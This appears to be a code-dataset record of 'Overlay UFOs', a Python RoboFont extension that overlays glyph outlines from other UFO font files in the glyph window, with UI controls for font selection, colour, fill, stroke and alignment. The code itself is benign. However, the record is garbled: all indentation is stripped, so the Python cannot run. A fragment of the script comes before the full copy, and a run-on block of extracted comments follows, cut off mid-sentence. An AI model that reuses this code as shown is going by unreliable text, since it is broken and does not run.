view.stroke = CheckBox((x, y, 60, 22), "Stroke", sizeStyle=C.STYLE_CHECKBOXSIZE,
#value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "stroke"), False),
value = False,
callback=self.strokeCallback)
y += C.LL
view.alignText = TextBox((x, y, 90, 50), 'Alignment', sizeStyle=C.STYLE_LABELSIZE)
y += C.L
view.align = RadioGroup((x, y, 90, 50), ['Left', 'Center', 'Right'], isVertical=True,
sizeStyle=C.STYLE_RADIOSIZE, callback=self.alignCallback)
view.align.set(0)
#view.contextLabel = TextBox((C.C2, -58, 90, 50), 'Contexts', sizeStyle=C.STYLE_LABELSIZE)
view.viewCurrent = CheckBox((C.C2, -60, 150, 22), "Always View Current", sizeStyle=C.STYLE_CHECKBOXSIZE,
value = False,
callback=self.contextEditCallback)
#view.contextUandlc = CheckBox((C.C2+170, -60, 85, 22), "Match Case", sizeStyle=C.STYLE_CHECKBOXSIZE,
# value = False,
# callback=self.contextEditCallback)
view.contextBefore = EditText((C.C2, -30, 85, 20), callback=self.contextEditCallback, continuous=True, sizeStyle="small", placeholder='Left Context')
view.contextCurrent = EditText((C.C2+95, -30, 60, 20), callback=self.contextCurrentEditCallback, continuous=True, sizeStyle="small")
view.contextAfter = EditText((C.C2+165, -30, 85, 20), callback=self.contextEditCallback, continuous=True, sizeStyle="small", placeholder='Right Context')
self.activateModule()
self.setUpBaseWindowBehavior()
def fontListCallback(self, sender):
u"""If there is a selection, toggle the status of these fonts."""
# Avoid recursive loop because of changing font selection
if not self._selectionChanging:
for selectedIndex in sender.getSelection():
item = sender.get()[selectedIndex]
if item['status']:
item['status'] = ''
else:
item['status'] = selectedSymbol
# If shift is held when pressing an entry in the font list,
# the non-selected fonts will swap with the current's state
if NSEvent.modifierFlags() & NSShiftKeyMask:
items = [sender.get()[i] for i in range(len(sender.get())) if i != selectedIndex]
for subItems in items:
if item['status'] == '':
subItems['status'] = selectedSymbol
else:
subItems['status'] = ''
self._selectionChanging = True
# Avoid recursive loop because of changing font selection
sender.setSelection([])
self._selectionChanging = False
self.updateView()
def canDraw(self):
return True
"""
There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now.
"""
#def isUpper(self, g):
# char = CharacterTX.glyph2Char(g)
# if len(char) > 1:
# char = char[0]
# if unicodedata.category(char) == 'Lu':
# return True
# return False
#def isLower(self, g):
# char = CharacterTX.glyph2Char(g)
# if len(char) > 1:
# char = char[0]
# if unicodedata.category(char) == 'Ll':
# return True
# return False
def getHiddenFont(self, path):
from builtins import str
for f in self.tool.getFonts():
if f.path == path:
return f
elif path == str(f.info.familyName)+" "+str(f.info.styleName):
return f
def drawBackground(self, info):
u"""Draw the background of defined glyphs and fonbts.
Scale is available as mouse.scale."""
view = self.getView()
if not view.viewEnabled.get():
return
fill = getExtensionDefault(self.DEFAULTKEY_FILL, True)
stroke = getExtensionDefault(self.DEFAULTKEY_STROKE, True)
fillcolor = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
glyph = info.get('glyph')
if glyph is not None:
current = glyph.getParent()
else:
current = self.tool.getCurrentFont()
if glyph is None or current is None:
return
align = self.getAlignment()
# Get the fonts from the list and see if they are selected.
sourceItems = self.getSourceFonts()
showFonts = []
for item in sourceItems:
if not item['status']:
continue
path = item['path']
font = self.getHiddenFont(path)
showFonts.append(font)
if view.viewCurrent.get() and current not in showFonts:
showFonts.append(current)
for font in showFonts:
self.fillColor.setFill()
self.strokeColor.setStroke()
contextBefore, contextCurrent, contextAfter = self.getContexts()
if font is not None:
contextBefore = splitText(contextBefore, TX.naked(font).unicodeData, TX.naked(font).groups)
contextBefore = [font[gname] for gname in contextBefore if gname in font.keys()]
contextAfter = splitText(contextAfter, TX.naked(font).unicodeData, TX.naked(font).groups)
contextAfter = [font[gname] for gname in contextAfter if gname in font.keys()]
contextCurrent = splitText(contextCurrent, TX.naked(font).unicodeData, TX.naked(font).groups)
if len(contextCurrent) > 0:
contextCurrent = [font[gname] for gname in [contextCurrent[0]] if gname in font.keys()]
if len(contextCurrent) > 0:
sourceGlyph = contextCurrent[0]
else:
sourceGlyph = None
elif glyph.name in font.keys():
sourceGlyph = font[glyph.name]
else:
sourceGlyph = None
"""
#There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now.
if view.contextUandlc.get():
caseTransform = None
if self.isUpper(glyph):
caseTransform = FontTX.unicodes.getUpperFromLower
elif self.isLower(glyph):
caseTransform = FontTX.unicodes.getLowerFromUpper
if caseTransform:
for i, g in enumerate(contextBefore):
newG = caseTransform(g)
if newG is not None:
contextBefore[i] = newG
newG = caseTransform(sourceGlyph)
if newG is not None:
sourceGlyph = newG
if caseTransform:
for i, g in enumerate(contextAfter):
newG = caseTransform(g)
if newG is not None:
contextAfter[i] = newG
"""
scale(current.info.unitsPerEm/float(font.info.unitsPerEm))
widthOffset = 0
if sourceGlyph is not None:
if align == 'center':
destCenter = float(glyph.width/2) / current.info.unitsPerEm
sourceCenter = float(sourceGlyph.width/2) / font.info.unitsPerEm
widthOffset = (destCenter-sourceCenter) * font.info.unitsPerEm
elif align == 'right':
widthOffset = ( ( glyph.width / glyph.getParent().info.unitsPerEm ) - (sourceGlyph.width / sourceGlyph.getParent().info.unitsPerEm ) ) * font.info.unitsPerEm
translate(widthOffset, 0)
previousGlyph = sourceGlyph
contextBefore.reverse()
totalWidth = 0
for i, cbGlyph in enumerate(contextBefore):
kernValue = 0
if previousGlyph is not None and previousGlyph.getParent() == cbGlyph.getParent():
# Uncomment to activate kerning. Requires FontTX.
#kernValue += FontTX.kerning.getValue((previousGlyph.name, cbGlyph.name), font.kerning, font.groups)
kernValue += 0
translate(-cbGlyph.width-kernValue, 0)
totalWidth += cbGlyph.width + kernValue
drawGlyphPath = TX.naked(cbGlyph).getRepresentation("defconAppKit.NSBezierPath")
if view.fill.get():
drawGlyphPath.fill()
if view.stroke.get():
strokePixelPath(drawGlyphPath)
previousGlyph = cbGlyph
translate(totalWidth, 0)
totalWidth = 0
contextCurrentAndAfter = [sourceGlyph]+contextAfter
for i, cbGlyph in enumerate(contextCurrentAndAfter):
if cbGlyph is None:
cbGlyph = sourceGlyph
nextGlyph = None
if i + 1 < len(contextCurrentAndAfter):
nextGlyph = contextCurrentAndAfter[i+1]
if (i == 0 and cbGlyph == glyph) or sourceGlyph is None:
pass
else:
drawGlyphPath = TX.naked(cbGlyph).getRepresentation("defconAppKit.NSBezierPath")
if view.fill.get():
drawGlyphPath.fill()
if view.stroke.get():
strokePixelPath(drawGlyphPath)
kernValue = 0
if cbGlyph is not None and nextGlyph is not None and nextGlyph.getParent() == cbGlyph.getParent():
#kernValue = FontTX.kerning.getValue((cbGlyph.name, nextGlyph.name), font.kerning, font.groups)
# Uncomment to activate kerning. Requires FontTX.
kernValue = 0
width = 0
if cbGlyph is not None:
width = cbGlyph.width
translate(width+kernValue, 0)
totalWidth += width + kernValue
previousGlyph = cbGlyph
translate(-totalWidth, 0)
translate(-widthOffset, 0)
scale(font.info.unitsPerEm/float(current.info.unitsPerEm))
#restore()
drawInactive = drawBackground
def viewCallback(self, sender):
self.updateView()
def getSourceFonts(self):
"""
Get the fonts in the list.
"""
view = self.getView()
return view.fontList.get()
def setSourceFonts(self):
u"""
Set the font list from the current set of open fonts.
"""
view = self.getView()
labels = []
currentSelection = []
for d in self.getSourceFonts():
if d['status']:
currentSelection.append(d['path'])
for status, path, name in self.tool.getFontLabels():
if path in currentSelection:
status = selectedSymbol
else:
status = ''
labels.append(dict(status=status, path=path, name=name))
view.fontList.set(labels)
def colorCallback(self, sender):
"""
Change the color.
"""
selectedColor = sender.get()
r = selectedColor.redComponent()
g = selectedColor.greenComponent()
b = selectedColor.blueComponent()
a = 1
strokeColor = NSColor.colorWithCalibratedRed_green_blue_alpha_(r, g, b, a)
setExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, selectedColor)
setExtensionDefaultColor(self.DEFAULTKEY_STROKECOLOR, strokeColor)
self.fillColor = selectedColor
self.strokeColor = strokeColor
self.updateView()
def fillCallback(self, sender):
"""
Change the fill status.
"""
setExtensionDefault(self.DEFAULTKEY_FILL, sender.get())
self.updateView()
def strokeCallback(self, sender):
"""
Change the stroke status.
"""
setExtensionDefault(self.DEFAULTKEY_STROKE, sender.get())
self.updateView()
def alignCallback(self, sender):
"""
Change the alignment status.
"""
self.updateView()
def getAlignment(self):
"""
Get the alignment as a string.
"""
view = self.getView()
index = view.align.get()
if index == 0:
return 'left'
elif index == 1:
return 'center'
elif index == 2:
return 'right'
def updateView(self, sender=None):
UpdateCurrentGlyphView()
def windowCloseCallback(self, sender):
self.deactivateModule()
self.updateView()
BaseWindowController.windowCloseCallback(self, sender)
def getFontItems(self, update=False):
"""
Get all fonts in a way that can be set into a vanilla list.
"""
paths = set() # Set of all unique paths in the merges lists
itemsByName = {}
if update: # If update flag is set, then keep the existing selected fonts.
for item in self.getSourceFonts():
if item['status']:
itemsByName[item['name']] = item
currentStatuses = {}
if hasattr(self.getView(), 'fontList'):
for d in self.getSourceFonts():
currentStatuses[d['path']] = d['status']
for status, path, uniqueName in self.tool.getFontLabels():
if path in currentStatuses:
status = currentStatuses[path]
else:
status = selectedSymbol
if not uniqueName in itemsByName.keys():# If it is not already there, add this to the list
itemsByName[uniqueName] = dict(status=status, path=path, name=uniqueName)
fontList = []
for key, item in sorted(itemsByName.items()):
fontList.append(item)
return fontList
################
# CONTEXTS
################
def getContexts(self):
if not hasattr(self, 'contextBefore'):
self.contextBefore = ''
if not hasattr(self, 'contextAfter'):
self.contextAfter = ''
if not hasattr(self, 'contextCurrent'):
self.contextCurrent = None
return self.contextBefore, self.contextCurrent, self.contextAfter
def setContexts(self, contextBefore, contextCurrent, contextAfter):
self.contextBefore = contextBefore
self.contextCurrent = contextCurrent
self.contextAfter = contextAfter
def contextEditCallback(self, sender):
before = self.getView().contextBefore.get()
current = self.getView().contextCurrent.get() or None
after = self.getView().contextAfter.get()
self.setContexts(before, current, after)
self.updateView()
def contextCurrentEditCallback(self, sender):
#if sender.get():
#sender.set(sender.get()[0])
self.contextEditCallback(sender)
if __name__ == "__main__":
OverlayUFOs() | #coding=utf-8
from __future__ import division
"""
# OVERLAY UFOS
For anyone looking in here, sorry the code is so messy. This is a standalone version of a script with a lot of dependencies.
"""
import os
from AppKit import * #@PydevCodeAnalysisIgnore
from vanilla import * #@PydevCodeAnalysisIgnore
from mojo.drawingTools import *
from mojo.events import addObserver, removeObserver
from mojo.extensions import getExtensionDefault, setExtensionDefault, getExtensionDefaultColor, setExtensionDefaultColor
from mojo.UI import UpdateCurrentGlyphView
from fontTools.pens.transformPen import TransformPen
from defconAppKit.windows.baseWindow import BaseWindowController
import unicodedata
#from lib.tools.defaults import getDefaultColor
from lib.tools.drawing import strokePixelPath
from lib.UI.spaceCenter.glyphSequenceEditText import splitText
from builtins import chr
selectedSymbol = u'•'
def SmallTextListCell(editable=False):
cell = NSTextFieldCell.alloc().init()
size = NSSmallControlSize #NSMiniControlSize
cell.setControlSize_(size)
font = NSFont.systemFontOfSize_(NSFont.systemFontSizeForControlSize_(size))
cell.setFont_(font)
cell.setEditable_(editable)
return cell
class TX:
"""
An agnostic way to get a naked font.
"""
@classmethod
def naked(cls, f):
try:
return f.naked()
except:
return f
class Tool():
"""
The tool object manages the font list. This is a simplification.
"""
fonts = AllFonts()
def addObserver(self, target, method, action):
addObserver(target, method, action)
def removeObserver(self, target, method, action):
removeObserver(target, method, action)
def getCurrentFont(self):
return CurrentFont()
def getFonts(self):
u"""Answers the list of selected fonts, ordered by their path.
"""
return self.fonts
def appendToFonts(self, path):
f = OpenFont(path, showUI=False)
self.fonts.append(f)
def removeFromFonts(self, path):
for i, f in enumerate(self.fonts):
if f.path == path:
del self.fonts[i]
def getFontPaths(self):
return [f.path or str(f.info.familyName)+" "+str(f.info.styleName) for f in self.getFonts()]
def getFontLabel(self, path):
if path is None:
return None
if not path:
return 'Untitled'
name = path.split('/')[-1]
status = selectedSymbol
return status, path, name
def getFontLabels(self):
labels = {}
for path in self.getFontPaths():
if path:
label = self.getFontLabel(path)
name = label[-1]
else:
name = 'Untitled'
if not name in labels:
labels[name] = []
labels[name].append(label)
sortedLabels = []
for _, labelSet in sorted(labels.items()):
if len(labelSet) == 1: # There is only a single font with this name
sortedLabels.append(labelSet[0])
else: # Otherwise we'll have to construct new names to show the difference
for status, path, name in sorted(labelSet):
sortedLabels.append((status, path, '%s "%s"' % (name, '/'.join(path.split('/')[:-1]))))
return sortedLabels
class C:
"""
Some constants.
"""
C2 = 100
BUTTON_WIDTH = 80
STYLE_CHECKBOXSIZE = 'small'
STYLE_LABELSIZE = 'small'
STYLE_RADIOSIZE = 'small'
L = 22
LL = 25
class OverlayUFOs(BaseWindowController):
DEFAULTKEY = "com.fontbureau.overlayUFO"
DEFAULTKEY_FILLCOLOR = "%s.fillColor" %DEFAULTKEY
DEFAULTKEY_STROKECOLOR = "%s.strokeColor" %DEFAULTKEY
DEFAULTKEY_STROKE = "%s.stroke" %DEFAULTKEY
DEFAULTKEY_FILL = "%s.fill" %DEFAULTKEY
FALLBACK_FILLCOLOR = NSColor.colorWithCalibratedRed_green_blue_alpha_(.5, 0, .5, .1)
FALLBACK_STROKECOLOR = NSColor.colorWithCalibratedRed_green_blue_alpha_(.5, 0, .5, .5)
VERSION = 1.0
NAME = u'Overlay UFOs'
MANUAL = u"""In the current glyph window, this will present the view the same glyph from a separate
UFO or set of UFOs.<br/>
This does NOT import the UFO into a background layer. Instead, it renders a outline directly from the UFO into the glyph window view.
<ul>
<li>There is no need to import duplicate data into a background layer.</li>
<li>The source outline is always live; when changes are made to the source, they will automatically
appear in the current without re-importing.</li>
<li>The source font does not need to be opened with a UI.</li>
</ul>
<h3>DIALOG</h3>
<ul>
<li>A floating dialog is present to let you open and select source fonts, fill, stroke, color.</li>
<li>Source Fonts: The default source font list is self.getOpenFonts(). The refresh button will
return this list to self.getOpenFonts().</li>
<li>Adding Fonts: You can manually add fonts by selecting a UFO file.
The UFO file will open without an interface.</li>
<li>Removing Fonts: There are buttons for removing selected fonts and for clearing the source font list.</li>
</ul>
<h3>BUGS/IMPROVEMENTS</h3>
<ul>
<li>Known Issue: The source font is drawn on top of the current font, instead of behind it.
So, it is good to select a color with a low opacity.</li>
<li>Known Bug: If the glyph window for both source and current fonts are open, it is possible
to select and inadvertently edit the source outline in the current window. I don't know how to solve this.</li>
<li>Improvement?: Add options to scale the source font.</li>
<li>Improvement?: Set different colors, fill settings for each font?</li>
</ul>
"""
# Fixed width of the window.
VIEWMINSIZE = 400
VIEWSIZE = VIEWMINSIZE
VIEWMAXSIZE = VIEWMINSIZE
WINDOW_POSSIZE = (130, 20, VIEWSIZE, 260)
WINDOW_MINSIZE = (VIEWMINSIZE, 260)
WINDOW_MAXSIZE = (VIEWMAXSIZE, 260)
def getPathListDescriptor(self):
return [
dict(title='Status', key='status', cell=SmallTextListCell(editable=False), width=12, editable=False),
dict(title='Name', key='name', width=300, cell=SmallTextListCell(editable=False), editable=False),
dict(title='Path', key='path', width=0, editable=False),
]
################
# OBSERVERS AND UPDATERS
################
def fontSelectionChanged(self):
self.setSourceFonts()
def activateModule(self):
self.tool.addObserver(self, 'drawInactive', 'drawInactive')
self.tool.addObserver(self, 'drawBackground', 'drawBackground')
self.tool.addObserver(self, 'fontDidOpen', 'fontDidOpen')
self.tool.addObserver(self, 'fontWillClose', 'fontWillClose')
def deactivateModule(self):
removeObserver(self, 'drawBackground')
removeObserver(self, 'drawInactive')
removeObserver(self, 'fontDidOpen')
removeObserver(self, 'fontWillClose')
################
# CONTEXTS
################
def fontDidOpen(self, info):
font = info.get('font')
if font:
self.tool.fonts.append(font)
self.refreshCallback()
def fontWillClose(self, info):
font = info.get('font')
path = font.path
if path:
self.tool.removeFromFonts(path)
self.refreshCallback()
def __init__(self):
self.tool = Tool()
self.w = FloatingWindow((400, 200), "Overlay UFOs", minSize=(400, 200))
self.populateView()
self.getView().open()
def getView(self):
return self.w
def refreshCallback(self, sender=None):
"""
Update the font list.
"""
self.getView().fontList.set(self.getFontItems())
def resetCallback(self, sender=None):
"""
Resets the view to the currently opened fonts.
"""
self.tool.fonts = AllFonts()
self.getView().fontList.set(self.getFontItems())
def addCallback(self, sender=None):
"""
Open a font without UI and add it to the font list.
"""
f = OpenFont(None, showUI=False)
if f is None:
return
self.tool.appendToFonts(f.path)
self.refreshCallback()
def populateView(self):
"""
The UI
"""
self.fillColor = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
self.strokeColor = getExtensionDefaultColor(self.DEFAULTKEY_STROKECOLOR, self.FALLBACK_STROKECOLOR)
self.contextBefore = self.contextAfter = ''
# Populating the view can only happen after the view is attached to the window,
# or else the relative widths go wrong.
view = self.getView()
view.add = Button((-40, 3, 30, 22), '+', callback=self.addCallback)
view.reset = Button((-40, 30, 30, 22), chr(8634), callback=self.resetCallback)
# Flag to see if the selection list click is in progress. We are resetting the selection
# ourselves, using the list "buttons", but changing that selection will cause another
# list update, that should be ignored.
self._selectionChanging = False
# Indicate that we are a drawing module
self._canDraw = True
self.sources = []
x = y = 4
view.fontList = List((C.C2, y, 250, -65), self.getFontItems(),
selectionCallback=self.fontListCallback,
drawFocusRing=False,
enableDelete=False,
allowsMultipleSelection=False,
allowsEmptySelection=True,
drawHorizontalLines=True,
showColumnTitles=False,
columnDescriptions=self.getPathListDescriptor(),
rowHeight=16,
)
view.viewEnabled = CheckBox((x, y, C.BUTTON_WIDTH, 22), "Show",
callback=self.viewCallback, sizeStyle=C.STYLE_CHECKBOXSIZE,
value=True)
y += C.L
view.fill = CheckBox((x, y, 60, 22), "Fill", sizeStyle=C.STYLE_CHECKBOXSIZE,
#value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "fill"), True),
value = True,
callback=self.fillCallback)
y += C.L
color = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
view.color = ColorWell((x, y, 60, 22),
color=color,
callback=self.colorCallback)
y += C.L + 5
view.stroke = CheckBox((x, y, 60, 22), "Stroke", sizeStyle=C.STYLE_CHECKBOXSIZE,
#value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "stroke"), False),
value = False,
callback=self.strokeCallback)
y += C.LL
view.alignText = TextBox((x, y, 90, 50), 'Alignment', sizeStyle=C.STYLE_LABELSIZE)
y += C.L
view.align = RadioGroup((x, y, 90, 50), ['Left', 'Center', 'Right'], isVertical=True,
sizeStyle=C.STYLE_RADIOSIZE, callback=self.alignCallback)
view.align.set(0)
#view.contextLabel = TextBox((C.C2, -58, 90, 50), 'Contexts', sizeStyle=C.STYLE_LABELSIZE)
view.viewCurrent = CheckBox((C.C2, -60, 150, 22), "Always View Current", sizeStyle=C.STYLE_CHECKBOXSIZE,
value = False,
callback=self.contextEditCallback)
#view.contextUandlc = CheckBox((C.C2+170, -60, 85, 22), "Match Case", sizeStyle=C.STYLE_CHECKBOXSIZE,
# value = False,
# callback=self.contextEditCallback)
view.contextBefore = EditText((C.C2, -30, 85, 20), callback=self.contextEditCallback, continuous=True, sizeStyle="small", placeholder='Left Context')
view.contextCurrent = EditText((C.C2+95, -30, 60, 20), callback=self.contextCurrentEditCallback, continuous=True, sizeStyle="small")
view.contextAfter = EditText((C.C2+165, -30, 85, 20), callback=self.contextEditCallback, continuous=True, sizeStyle="small", placeholder='Right Context')
self.activateModule()
self.setUpBaseWindowBehavior()
def fontListCallback(self, sender):
u"""If there is a selection, toggle the status of these fonts."""
# Avoid recursive loop because of changing font selection
if not self._selectionChanging:
for selectedIndex in sender.getSelection():
item = sender.get()[selectedIndex]
if item['status']:
item['status'] = ''
else:
item['status'] = selectedSymbol
# If shift is held when pressing an entry in the font list,
# the non-selected fonts will swap with the current's state
if NSEvent.modifierFlags() & NSShiftKeyMask:
items = [sender.get()[i] for i in range(len(sender.get())) if i != selectedIndex]
for subItems in items:
if item['status'] == '':
subItems['status'] = selectedSymbol
else:
subItems['status'] = ''
self._selectionChanging = True
# Avoid recursive loop because of changing font selection
sender.setSelection([])
self._selectionChanging = False
self.updateView()
def canDraw(self):
return True
"""
There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now.
"""
#def isUpper(self, g):
# char = CharacterTX.glyph2Char(g)
# if len(char) > 1:
# char = char[0]
# if unicodedata.category(char) == 'Lu':
# return True
# return False
#def isLower(self, g):
# char = CharacterTX.glyph2Char(g)
# if len(char) > 1:
# char = char[0]
# if unicodedata.category(char) == 'Ll':
# return True
# return False
def getHiddenFont(self, path):
from builtins import str
for f in self.tool.getFonts():
if f.path == path:
return f
elif path == str(f.info.familyName)+" "+str(f.info.styleName):
return f
def drawBackground(self, info):
u"""Draw the background of defined glyphs and fonbts.
Scale is available as mouse.scale."""
view = self.getView()
if not view.viewEnabled.get():
return
fill = getExtensionDefault(self.DEFAULTKEY_FILL, True)
stroke = getExtensionDefault(self.DEFAULTKEY_STROKE, True)
fillcolor = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
glyph = info.get('glyph')
if glyph is not None:
current = glyph.getParent()
else:
current = self.tool.getCurrentFont()
if glyph is None or current is None:
return
align = self.getAlignment()
# Get the fonts from the list and see if they are selected.
sourceItems = self.getSourceFonts()
showFonts = []
for item in sourceItems:
if not item['status']:
continue
path = item['path']
font = self.getHiddenFont(path)
showFonts.append(font)
if view.viewCurrent.get() and current not in showFonts:
showFonts.append(current)
for font in showFonts:
self.fillColor.setFill()
self.strokeColor.setStroke()
contextBefore, contextCurrent, contextAfter = self.getContexts()
if font is not None:
contextBefore = splitText(contextBefore, TX.naked(font).unicodeData, TX.naked(font).groups)
contextBefore = [font[gname] for gname in contextBefore if gname in font.keys()]
contextAfter = splitText(contextAfter, TX.naked(font).unicodeData, TX.naked(font).groups)
contextAfter = [font[gname] for gname in contextAfter if gname in font.keys()]
contextCurrent = splitText(contextCurrent, TX.naked(font).unicodeData, TX.naked(font).groups)
if len(contextCurrent) > 0:
contextCurrent = [font[gname] for gname in [contextCurrent[0]] if gname in font.keys()]
if len(contextCurrent) > 0:
sourceGlyph = contextCurrent[0]
else:
sourceGlyph = None
elif glyph.name in font.keys():
sourceGlyph = font[glyph.name]
else:
sourceGlyph = None
"""
#There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now.
if view.contextUandlc.get():
caseTransform = None
if self.isUpper(glyph):
caseTransform = FontTX.unicodes.getUpperFromLower
elif self.isLower(glyph):
caseTransform = FontTX.unicodes.getLowerFromUpper
if caseTransform:
for i, g in enumerate(contextBefore):
newG = caseTransform(g)
if newG is not None:
contextBefore[i] = newG
newG = caseTransform(sourceGlyph)
if newG is not None:
sourceGlyph = newG
if caseTransform:
for i, g in enumerate(contextAfter):
newG = caseTransform(g)
if newG is not None:
contextAfter[i] = newG
"""
scale(current.info.unitsPerEm/float(font.info.unitsPerEm))
widthOffset = 0
if sourceGlyph is not None:
if align == 'center':
destCenter = float(glyph.width/2) / current.info.unitsPerEm
sourceCenter = float(sourceGlyph.width/2) / font.info.unitsPerEm
widthOffset = (destCenter-sourceCenter) * font.info.unitsPerEm
elif align == 'right':
widthOffset = ( ( glyph.width / glyph.getParent().info.unitsPerEm ) - (sourceGlyph.width / sourceGlyph.getParent().info.unitsPerEm ) ) * font.info.unitsPerEm
translate(widthOffset, 0)
previousGlyph = sourceGlyph
contextBefore.reverse()
totalWidth = 0
for i, cbGlyph in enumerate(contextBefore):
kernValue = 0
if previousGlyph is not None and previousGlyph.getParent() == cbGlyph.getParent():
# Uncomment to activate kerning. Requires FontTX.
#kernValue += FontTX.kerning.getValue((previousGlyph.name, cbGlyph.name), font.kerning, font.groups)
kernValue += 0
translate(-cbGlyph.width-kernValue, 0)
totalWidth += cbGlyph.width + kernValue
drawGlyphPath = TX.naked(cbGlyph).getRepresentation("defconAppKit.NSBezierPath")
if view.fill.get():
drawGlyphPath.fill()
if view.stroke.get():
strokePixelPath(drawGlyphPath)
previousGlyph = cbGlyph
translate(totalWidth, 0)
totalWidth = 0
contextCurrentAndAfter = [sourceGlyph]+contextAfter
for i, cbGlyph in enumerate(contextCurrentAndAfter):
if cbGlyph is None:
cbGlyph = sourceGlyph
nextGlyph = None
if i + 1 < len(contextCurrentAndAfter):
nextGlyph = contextCurrentAndAfter[i+1]
if (i == 0 and cbGlyph == glyph) or sourceGlyph is None:
pass
else:
drawGlyphPath = TX.naked(cbGlyph).getRepresentation("defconAppKit.NSBezierPath")
if view.fill.get():
drawGlyphPath.fill()
if view.stroke.get():
strokePixelPath(drawGlyphPath)
kernValue = 0
if cbGlyph is not None and nextGlyph is not None and nextGlyph.getParent() == cbGlyph.getParent():
#kernValue = FontTX.kerning.getValue((cbGlyph.name, nextGlyph.name), font.kerning, font.groups)
# Uncomment to activate kerning. Requires FontTX.
kernValue = 0
width = 0
if cbGlyph is not None:
width = cbGlyph.width
translate(width+kernValue, 0)
totalWidth += width + kernValue
previousGlyph = cbGlyph
translate(-totalWidth, 0)
translate(-widthOffset, 0)
scale(font.info.unitsPerEm/float(current.info.unitsPerEm))
#restore()
drawInactive = drawBackground
def viewCallback(self, sender):
self.updateView()
def getSourceFonts(self):
"""
Get the fonts in the list.
"""
view = self.getView()
return view.fontList.get()
def setSourceFonts(self):
u"""
Set the font list from the current set of open fonts.
"""
view = self.getView()
labels = []
currentSelection = []
for d in self.getSourceFonts():
if d['status']:
currentSelection.append(d['path'])
for status, path, name in self.tool.getFontLabels():
if path in currentSelection:
status = selectedSymbol
else:
status = ''
labels.append(dict(status=status, path=path, name=name))
view.fontList.set(labels)
def colorCallback(self, sender):
"""
Change the color.
"""
selectedColor = sender.get()
r = selectedColor.redComponent()
g = selectedColor.greenComponent()
b = selectedColor.blueComponent()
a = 1
strokeColor = NSColor.colorWithCalibratedRed_green_blue_alpha_(r, g, b, a)
setExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, selectedColor)
setExtensionDefaultColor(self.DEFAULTKEY_STROKECOLOR, strokeColor)
self.fillColor = selectedColor
self.strokeColor = strokeColor
self.updateView()
def fillCallback(self, sender):
"""
Change the fill status.
"""
setExtensionDefault(self.DEFAULTKEY_FILL, sender.get())
self.updateView()
def strokeCallback(self, sender):
"""
Change the stroke status.
"""
setExtensionDefault(self.DEFAULTKEY_STROKE, sender.get())
self.updateView()
def alignCallback(self, sender):
"""
Change the alignment status.
"""
self.updateView()
def getAlignment(self):
"""
Get the alignment as a string.
"""
view = self.getView()
index = view.align.get()
if index == 0:
return 'left'
elif index == 1:
return 'center'
elif index == 2:
return 'right'
def updateView(self, sender=None):
UpdateCurrentGlyphView()
def windowCloseCallback(self, sender):
self.deactivateModule()
self.updateView()
BaseWindowController.windowCloseCallback(self, sender)
def getFontItems(self, update=False):
"""
Get all fonts in a way that can be set into a vanilla list.
"""
paths = set() # Set of all unique paths in the merges lists
itemsByName = {}
if update: # If update flag is set, then keep the existing selected fonts.
for item in self.getSourceFonts():
if item['status']:
itemsByName[item['name']] = item
currentStatuses = {}
if hasattr(self.getView(), 'fontList'):
for d in self.getSourceFonts():
currentStatuses[d['path']] = d['status']
for status, path, uniqueName in self.tool.getFontLabels():
if path in currentStatuses:
status = currentStatuses[path]
else:
status = selectedSymbol
if not uniqueName in itemsByName.keys():# If it is not already there, add this to the list
itemsByName[uniqueName] = dict(status=status, path=path, name=uniqueName)
fontList = []
for key, item in sorted(itemsByName.items()):
fontList.append(item)
return fontList
################
# CONTEXTS
################
def getContexts(self):
if not hasattr(self, 'contextBefore'):
self.contextBefore = ''
if not hasattr(self, 'contextAfter'):
self.contextAfter = ''
if not hasattr(self, 'contextCurrent'):
self.contextCurrent = None
return self.contextBefore, self.contextCurrent, self.contextAfter
def setContexts(self, contextBefore, contextCurrent, contextAfter):
self.contextBefore = contextBefore
self.contextCurrent = contextCurrent
self.contextAfter = contextAfter
def contextEditCallback(self, sender):
before = self.getView().contextBefore.get()
current = self.getView().contextCurrent.get() or None
after = self.getView().contextAfter.get()
self.setContexts(before, current, after)
self.updateView()
def contextCurrentEditCallback(self, sender):
#if sender.get():
#sender.set(sender.get()[0])
self.contextEditCallback(sender)
if __name__ == "__main__":
OverlayUFOs() | en | 0.706843 | #coding=utf-8 # OVERLAY UFOS For anyone looking in here, sorry the code is so messy. This is a standalone version of a script with a lot of dependencies. #@PydevCodeAnalysisIgnore #@PydevCodeAnalysisIgnore #from lib.tools.defaults import getDefaultColor #NSMiniControlSize An agnostic way to get a naked font. The tool object manages the font list. This is a simplification. Answers the list of selected fonts, ordered by their path. # There is only a single font with this name # Otherwise we'll have to construct new names to show the difference Some constants. In the current glyph window, this will present the view the same glyph from a separate UFO or set of UFOs.<br/> This does NOT import the UFO into a background layer. Instead, it renders a outline directly from the UFO into the glyph window view. <ul> <li>There is no need to import duplicate data into a background layer.</li> <li>The source outline is always live; when changes are made to the source, they will automatically appear in the current without re-importing.</li> <li>The source font does not need to be opened with a UI.</li> </ul> <h3>DIALOG</h3> <ul> <li>A floating dialog is present to let you open and select source fonts, fill, stroke, color.</li> <li>Source Fonts: The default source font list is self.getOpenFonts(). The refresh button will return this list to self.getOpenFonts().</li> <li>Adding Fonts: You can manually add fonts by selecting a UFO file. The UFO file will open without an interface.</li> <li>Removing Fonts: There are buttons for removing selected fonts and for clearing the source font list.</li> </ul> <h3>BUGS/IMPROVEMENTS</h3> <ul> <li>Known Issue: The source font is drawn on top of the current font, instead of behind it. So, it is good to select a color with a low opacity.</li> <li>Known Bug: If the glyph window for both source and current fonts are open, it is possible to select and inadvertently edit 